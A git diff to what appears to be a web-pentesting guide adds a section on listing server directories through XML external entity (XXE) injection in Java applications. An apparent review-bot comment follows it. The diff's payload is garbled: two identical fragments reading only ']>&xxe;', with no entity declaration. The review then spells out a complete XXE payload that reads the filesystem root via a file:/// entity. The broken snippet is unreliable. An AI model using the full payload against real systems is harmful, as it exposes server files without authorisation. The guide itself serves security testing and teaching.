diff --git a/pentesting-web/xxe-xee-xml-external-entity.md b/pentesting-web/xxe-xee-xml-external-entity.md index aded7f527..d08f86571 100644 --- a/pentesting-web/xxe-xee-xml-external-entity.md +++ b/pentesting-web/xxe-xee-xml-external-entity.md @@ -119,6 +119,18 @@ In this third case notice we are declaring the `Element stockCheck` as ANY ![](../.gitbook/assets/image%20%2832%29.png) +### Directory listing + +In **java** based applications it might be possible to **list the contents of a directory** via XXE with a payload like: + +```markup + +]>&xxe; + + +]>&xxe; +``` + ### SSRF An XXE could also bu used to abuse a SSRF inside a cloud
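Review bot: the payload in the new `### Directory listing` fence is incomplete as shown; both lines inside the `markup` block read only `]>&xxe;`, so the `<!DOCTYPE ...>`/`<!ENTITY xxe SYSTEM "file:///...">` declaration that `&xxe;` refers to and the root element that carries the reference are missing, and the two "variants" are identical. Suggest restoring the full form for each, for example `<!DOCTYPE aa[<!ELEMENT bb ANY><!ENTITY xxe SYSTEM "file:///">]><root>&xxe;</root>` for the filesystem root and a second one with a specific directory in the `SYSTEM` URL, and adding one sentence after "In **java** based applications it might be possible to **list the contents of a directory**" saying why it is Java-specific (the listing comes from how Java's `file:` URL handler resolves a directory, not from XXE itself), so readers do not expect it to work against other parsers. Minor: "**java** based" should read "Java-based".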